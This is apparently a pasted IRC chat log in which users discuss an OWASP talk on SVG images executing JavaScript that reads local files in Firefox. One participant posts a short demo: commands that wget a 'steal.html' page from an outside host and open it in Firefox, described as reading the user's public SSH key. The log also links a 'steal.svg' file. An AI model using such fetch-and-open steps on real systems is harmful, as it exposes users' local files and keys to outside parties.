SVG javascript attack

From Anonymous, 8 Years ago, written in Plain Text, viewed 138 times.
URL http://minetest.wjake.com/stikked/view/8753eb39
  1. [00:41:37] <Jenda`> https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf
  2. [00:44:50] <atalax> "Image is an SVG and executes JavaScript locally" "Attacker can read local files (same directory, sub-folders)"
  3. [00:44:54] <atalax> wtf?!
  4. [00:50:38] <Jenda`> yes, it works in firefox
  5. [00:52:27] <Jenda`> at least in html
  6. [00:52:30] <Jenda`> cd ~
  7. [00:52:35] <Jenda`> wget -q http://jenda.hrach.eu/steal.html
  8. [00:52:39] <Jenda`> firefox  steal.html
  9. [00:52:51] <Jenda`> (don't worry, it reads the *public* ssh key)
  10. [00:53:43] <Mrkva> but I have to save it to ~/
  11. [00:54:57] <Jenda`> yeah
  12. [00:58:52] <Jenda`> http://jenda.hrach.eu/steal.svg
  13. [00:59:01] <Jenda`> nobody expects…
  14. [00:59:28] <atalax> imho you can also find out some pretty interesting things from the contents of ~/Downloads/
